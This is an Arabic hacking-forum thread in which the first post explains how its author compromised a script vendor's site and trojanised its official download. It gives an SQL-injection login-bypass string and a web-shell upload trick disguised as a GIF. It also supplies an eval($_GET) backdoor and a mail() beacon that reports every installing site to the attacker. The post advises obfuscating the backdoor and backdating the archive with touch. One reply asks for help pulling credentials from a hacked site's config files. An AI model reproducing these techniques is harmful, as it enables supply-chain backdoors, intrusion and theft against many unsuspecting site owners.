تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



::. قسم إختراق المواقع والمنتديات .:: شروحات إختراق المواقع والسيرفرات والمنتديات وأجدد أدوات إختراق المواقع وأجدد الثغرات

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية #31#
#31#

#31# غير متواجد حالياً
 
رقم العضوية : 66322
تاريخ التسجيل : Oct 2016
مكان الإقامة :
عدد المشاركات : 1
عدد النقاط : 10
قوة التقييم :
hmmm كيف قمت باختراق مئات المواقع بحركة بسيطة

كُتب : [ 10-10-2016 - 02:19 AM ]


السلام عليكم ورحمة الله تعالى وبركاته

في يوم من الأيام كنت مستهدف احد المواقع لكن ياللأسف الموقع كان لوحده على السرفر

لذا صعب علي مهمة اختراقه لكن وجدت عليه سكربت مشهور فقررت ابحث عن ثغرة للسكربت

في احد مواقع السيكوريتي المشهورة لكن للأسف الثغرات كلها مغلقة ماذا افعل قررت

احمل السكربت من الموقع الرسمي وافحصه لعلي اجد ثغرة ما وبعد الفحص لا جدوى لم اجد

شيئ وبعد ذلك لا ادري كيف لكن جاءتني فكرة اختراق موقع السكربت نفسه فقمت بفحصه

فحص سطحي لم اجد شيء فقمت بالبحث عن سب دومين فوجدت 2 من سب دومين ولحسن

حظي بعد البحث وجدت الموقع مصاب بثغرة bypass login admin



'or 'a'='a
'or 'a'='a

بعدما تم الدخول بنجاح وجدت مركز رفع حاولت الرفع بصيغة php لاجدوى حاولت الرفع بصيغة

shell.php.gif لاجدوى رفعت بصيغة gif



وهذا ماظهر لي بعد استعراض الشل



سأستبدل صيغة gif ب php لاحظ ماذا حدث



الان سنبحث عن مكان السكربت والحمد لله وجدناه



الان سنحمل السكربت ثم نلغمه بثغرة remote code execution هذا هو الكود

كود PHP:
<?
$code
=$_GET['id'];
eval(
$code);
?>
تستطيع تلغيمه بأي ثغرة انا استخدمت الرموت لسهولتها وخطورتها لكن سيتفطن صاحب

السكربت وخاصة من يحمل السكربت ويفحصه لهذا يجب علي ان اشفره يوجد الكثير من دوال

التشفير لن ادخل في التفاصيل بعد تشفير كود الثغرة هل سأرفعه على الموقع طبعا لا لو

رفعته كيف سأعرف الاشخاص الذين سيركبون السكربت على مواقعهم المهم بعد البحث في

الموقع انظروا ماذا وجدت



عدد المواقع المركبة هذا السكربت بالالاف ياسلام لكن نفترض اننا لم نجد هذه الخاصية في

الموقع ماذا سنفعل صحيح سنلغم بدالة mail الجميع يعرف معناها سنستخدمها لارسال

المواقع التي ستركب هذا السكربت طبعا بعد تلغيمنا له اليكم الكود

كود PHP:
<?php
$ip 
getenv("REMOTE_ADDR");
$subj98 "Mailer Upload From $ip";
$email "[email protected]";
$from "[email protected]";
$actual_link "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
mail($email$subj98$actual_link$from);
?>
الان نستطيع رفع السكربت الملغم على الموقع بعدما رفعت السكربت طبعا ساقوم

بتغيير التاريخ لتاريخ السكربت السابق لكي لا يشك صاحب الموقع فالسكربت السابق كان

في عام 2014 و نحن في عام 2016 هذا هو امر التغيير

كود PHP:
touch -"2014-10-07 09:12:12" script.zip 
المهم عدت بعد ايام وهذا ماوجدته



سنجرب الثغرة على احد المواقع التي وصلتنا اليكم الصورة



انشاء الله انكم استفدتم ولمن لم تظهر له الصور فهي في المرفقات


الملفات المرفقة
نوع الملف: zip #31#.zip‏ (350.7 كيلوبايت, المشاهدات 21)
توقيع : #31#



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
zero_cool
مشرف
رقم العضوية : 17240
تاريخ التسجيل : Jan 2011
مكان الإقامة :
عدد المشاركات : 638
عدد النقاط : 10

zero_cool غير متواجد حالياً

افتراضي

كُتب : [ 10-10-2016 - 04:39 AM ]


موضوع جميل يا اخي


توقيع : zero_cool

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
MrKurd
المشرف العام
رقم العضوية : 62044
تاريخ التسجيل : Feb 2015
مكان الإقامة :
عدد المشاركات : 701
عدد النقاط : 10

MrKurd غير متواجد حالياً

Die But Don't Lie

افتراضي

كُتب : [ 11-20-2016 - 05:53 PM ]


جميل جدا اخي الله يبارك فيك (:


توقيع : MrKurd

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
rootkit

رقم العضوية : 66348
تاريخ التسجيل : Nov 2016
مكان الإقامة :
عدد المشاركات : 19
عدد النقاط : 10

rootkit غير متواجد حالياً

افتراضي

كُتب : [ 11-22-2016 - 05:36 PM ]


شكرا لك على طرح جميل


توقيع : rootkit


رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
shadoix0

رقم العضوية : 65577
تاريخ التسجيل : Jun 2016
مكان الإقامة :
عدد المشاركات : 2
عدد النقاط : 10

shadoix0 غير متواجد حالياً

افتراضي

كُتب : [ 11-23-2016 - 03:39 AM ]


جزاك الله خيرا ..
اخي انا عندي مشكلة في موقع اخترقتو طبعا موقع https وعندما حاولت سحب الكونفيق باستخدام سكربت سحب معي عادي ولكن اجاني صفحة بيضا بس لما ببحث عن ملفات الكونفيق من الشل بلاقي ملفات كونفيق ولكن اليوزر نيم واباسوورد ما بكونو موجودين يعني بكون زي هيك $Passord = "" Username = "" وكذلك باقي المعلومات للدخول للوكل هوست ممكن حل ؟؟ الرجاء الرد


توقيع : shadoix0



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
MrKurd
المشرف العام
رقم العضوية : 62044
تاريخ التسجيل : Feb 2015
مكان الإقامة :
عدد المشاركات : 701
عدد النقاط : 10

MrKurd غير متواجد حالياً

Die But Don't Lie

افتراضي

كُتب : [ 11-23-2016 - 06:31 PM ]


اقتباس
المشاركة الأصلية كتبت بواسطة shadoix0 مشاهدة المشاركة
جزاك الله خيرا ..
اخي انا عندي مشكلة في موقع اخترقتو طبعا موقع https وعندما حاولت سحب الكونفيق باستخدام سكربت سحب معي عادي ولكن اجاني صفحة بيضا بس لما ببحث عن ملفات الكونفيق من الشل بلاقي ملفات كونفيق ولكن اليوزر نيم واباسوورد ما بكونو موجودين يعني بكون زي هيك $passord = "" username = "" وكذلك باقي المعلومات للدخول للوكل هوست ممكن حل ؟؟ الرجاء الرد
ارجوا ان تعمل موضوع في قسم مساعدة اعضاء .... وسيتم بعدها حذف مشاركتك هنا

توقيع : MrKurd

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
مئات, المواقع, باختراق, بحركة, بسيطة, قلب, كيف


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مساعدة مشكلة باختراق المواقع sql [email protected] .:: قسم مساعدة الاعضاء ::. 3 07-26-2014 07:51 PM
جميع طرق اختراق المواقع مهم جدا جدا جدا k.l ::. قسم إختراق المواقع والمنتديات .:: 36 07-23-2014 03:10 PM
مشاكل باختراق المواقع mohamed-akoub .:: قسم مساعدة الاعضاء ::. 0 06-13-2014 09:23 PM
1)استهداف المواقع والسيرفرات evil man ::. قسم إختراق المواقع والمنتديات .:: 6 08-10-2012 10:25 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 08:23 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @